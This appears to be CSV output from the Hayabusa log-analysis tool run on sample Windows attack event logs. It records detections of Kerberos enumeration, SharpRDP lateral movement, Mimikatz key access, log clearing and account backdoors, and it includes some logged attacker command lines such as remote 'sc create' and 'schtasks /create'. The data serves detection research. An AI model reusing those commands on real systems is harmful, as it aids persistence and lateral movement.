2020-07-10 05:41:04.885 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: FS03VULN$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.887 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.912 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.939 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.949 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.950 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:04.951 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: krbtgt | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:05.016 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC2$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:58.983 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:41:59.810 +09:00,rootdc1.offsec.lan,4769,info,,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN | Svc: ROOTDC1$ | IP Addr: ::ffff:10.23.23.9 | Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4769-Kerberos TGS host enumeration (Bloodhound).evtx
2020-07-10 05:57:38.917 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5bad,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.334 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5bf1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.365 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5c04,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.430 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.714 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5c7f,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.723 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5cb1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.725 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5cc8,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.728 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: lambda-user | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f5cf4,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:40.825 +09:00,rootdc1.offsec.lan,4662,medium,Disc,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:57:52.909 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ATACORE01$ | Computer: - | IP Addr: 10.23.42.30 | LID: 0x64f5ef5,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:58:11.977 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f6471,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:58:11.981 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: ROOTDC1$ | Computer: - | IP Addr: fe80::1cae:5aa4:9d8d:106a | LID: 0x64f64a3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:58:12.004 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f64ca,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f64e1,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 05:58:12.005 +09:00,rootdc1.offsec.lan,4624,info,,Logon Type 3 - Network,User: admmig | Computer: - | IP Addr: 10.23.23.9 | LID: 0x64f64f3,rules/hayabusa/default/events/Security/Logons/4624_LogonType-3-Network.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0007-Discovery/T1087-Account discovery/ID4662-4624-Honeypot account property read.evtx
2020-07-10 06:22:31.163 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx"
2020-07-10 06:25:41.773 +09:00,rootdc1.offsec.lan,5136,high,Persis,Active Directory User Backdoors,,rules/sigma/builtin/security/win_alert_ad_user_backdoors.yml,"../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4738,5136-SPN set on user account.evtx"
2020-07-10 07:00:11.181 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52543 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:17.584 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 2568 | PGUID: 747F3D96-9371-5F07-0000-00102D024400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:27.033 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52545 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:31.217 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 7356 | PGUID: 747F3D96-937F-5F07-0000-0010EBDD4400",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:40.413 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52546 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:45.589 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\cmd.exe"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 7976 | PGUID: 747F3D96-938D-5F07-0000-001043A84500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:48.105 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: c:\windows\system32\notepad.exe | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\cmd.exe"" | LID: 0x68b4a | PID: 8032 | PGUID: 747F3D96-9390-5F07-0000-00105CBC4500",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:00:58.550 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:52547 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 428 | PGUID: 747F3D96-85F1-5F07-0000-001074CB0000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:01:03.898 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" | Process: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x68b4a | PID: 7456 | PGUID: 747F3D96-939F-5F07-0000-0010888E4600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:01:06.427 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\windows\system32\notepad.exe"" | Process: C:\Windows\System32\notepad.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\system32\WindowsPowerShell\v1.0\PowerShell.exe"" | LID: 0x68b4a | PID: 7200 | PGUID: 747F3D96-93A2-5F07-0000-00108EC54600",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:05:58.373 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: cmd.exe | Process: C:\Windows\System32\cmd.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: ? | LID: 0x3e7 | PID: 3096 | PGUID: 747F3D96-94C3-5F07-0000-001080B40100,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 07:06:07.487 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Explorer.EXE | Process: C:\Windows\explorer.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\system32\userinit.exe | LID: 0x3bfab | PID: 3248 | PGUID: 747F3D96-94CF-5F07-0000-0010BD590400,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_3_12_13_1_SharpRDP.evtx
2020-07-10 19:20:34.910 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: rdpclip | Process: C:\Windows\System32\rdpclip.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\System32\svchost.exe -k NetworkService -s TermService | LID: 0x3bfab | PID: 3304 | PGUID: 747F3D96-40F2-5F08-0000-0010D8A92C00,rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
2020-07-10 19:20:35.589 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 192.168.56.1:53627 (LAPTOP-JU4M3I0E) | Dst: 192.168.56.101:3389 (MSEDGEWIN10) | User: NT AUTHORITY\NETWORK SERVICE | Process: C:\Windows\System32\svchost.exe | PID: 824 | PGUID: 747F3D96-1350-5F08-0000-001014C50000,rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
2020-07-10 19:20:37.637 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""\\tsclient\c\temp\stack\a.exe"" | Process: \\tsclient\c\temp\stack\a.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: C:\Windows\Explorer.EXE | LID: 0x3bfab | PID: 4236 | PGUID: 747F3D96-40F5-5F08-0000-001095812D00",rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
2020-07-10 19:20:37.637 +09:00,MSEDGEWIN10,1,low,Exec,Process Start From Suspicious Folder,,rules/sigma/process_creation/proc_creation_win_susp_run_folder.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Lateral Movement/LM_sysmon_1_12_13_3_tsclient_SharpRdp.evtx
2020-07-11 22:21:11.693 +09:00,wec02,70,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
2020-07-11 22:21:17.514 +09:00,wec02,70,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
2020-07-11 22:21:18.640 +09:00,wec02,70,high,ResDev,Relevant Anti-Virus Event,,rules/sigma/builtin/application/win_av_relevant_match.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1552.004-Unsecured Credentials-Private Keys/ID70-CAPI-Private key accessed Mimikatz.evtx
2020-07-12 02:16:42.576 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx
2020-07-12 02:16:42.592 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx
2020-07-12 02:16:50.984 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.002-SMB Windows Admin Shares/ID5142- New file share created.evtx
2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx
2020-07-12 02:17:49.788 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop\desktop.ini | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx
2020-07-12 02:18:01.228 +09:00,fs02.offsec.lan,5145,info,Collect,Network Share File Access,User: admmig | Share Name: \\*\C$ | Share Path: \??\C:\ | Path: Users\admmig\Desktop | IP Addr: 10.23.23.9 | LID: 0x3023704,rules/hayabusa/non-default/events/Security/5145_NetworkShareFileAccess.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0005-Defense Evasion/T1222.001-File and Directory Permissions Modification/ID5143-File share permissions changed.evtx
2020-07-12 06:09:03.249 +09:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,Cmd Line: schtasks /create /s fs02 /tn tasks_test_hacker2 /tr myapp.exe /sc daily /mo 10 | Path: C:\Windows\System32\schtasks.exe | PID: 0x1e18 | User: lambda-user | LID: 0x1d41a5fa,rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4688-Scheduled task creation.evtx
2020-07-12 06:38:17.445 +09:00,fs02.offsec.lan,4699,medium,Exec | PrivEsc,Scheduled Task Deletion,,rules/sigma/builtin/security/win_scheduled_task_deletion.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0002-Execution/T1053.005-Scheduled Task/ID4698-4699-Fast created & deleted task by SMBexec (sups. arg.).evtx
2020-07-12 06:46:39.786 +09:00,jump01.offsec.lan,4688,low,,Suspicious Cmd Line_Possible LOLBIN Abuse,"Cmd Line: sc \\fs02\ create hacker-testl binPath=""virus.exe"" | Path: C:\Windows\System32\sc.exe | PID: 0x53c | User: admmig | LID: 0x58dbaa",rules/hayabusa/non-default/alerts/Security/4688_SuspiciousCommandLine-PossibleLOLBIN-Abuse.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID4688-Command SC to create service on remote host.evtx
2020-07-12 06:49:56.318 +09:00,fs02.offsec.lan,104,high,Evas,System Log File Cleared,User: admmig,rules/hayabusa/default/alerts/System/104_IndicatorRemovalOnHost-ClearWindowsEventLogs_SystemLogCleared.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-Random service installation.evtx
2020-07-12 06:50:07.213 +09:00,fs02.offsec.lan,7045,info,,New Service Installed,Name: bad-task | Path: virusé.exe | Account: LocalSystem | Start Type: demand start,rules/hayabusa/default/events/System/7045_NewServiceInstalled.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1543.003-Create or Modify System Process-Windows Service/ID7045-Random service installation.evtx
2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,low,Persis,Local User Account Created,User: admin-kriss | SID: S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-4726 Fast created-deleted user.evtx
2020-07-12 14:10:08.442 +09:00,rootdc1.offsec.lan,4720,low,Persis,Local User Account Created,User: admin-kriss | SID: S-1-5-21-4230534742-2542757381-3142984815-1166,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Admin like user created.evtx
2020-07-12 14:12:58.295 +09:00,jump01.offsec.lan,4720,low,Persis,Local User Account Created,User: hacking-local-acct | SID: S-1-5-21-1470532092-3758209836-3742276719-1001,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_UserAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Local user created.evtx
2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-1470532092-3758209836-3742276719-1001 | Group: Administrators | LID: 0x58d874,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-User added to local admin groups.evtx
2020-07-12 14:14:30.976 +09:00,jump01.offsec.lan,4732,high,Persis,User Added To Local Administrators Group,SID: S-1-5-21-1470532092-3758209836-3742276719-1001 | Group: Administrators | LID: 0x58d874,rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalAdministratorsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4732-4733-Quick added-removed user from local group.evtx
2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,low,Persis,User Added To Local Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1158 | Group: Group02 | LID: 0x807afcb,rules/hayabusa/default/alerts/Security/4728-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx
2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,medium,Persis,User Added To Global Security Group,SID: S-1-5-21-4230534742-2542757381-3142984815-1158 | Group: Group02 | LID: 0x807afcb,rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx
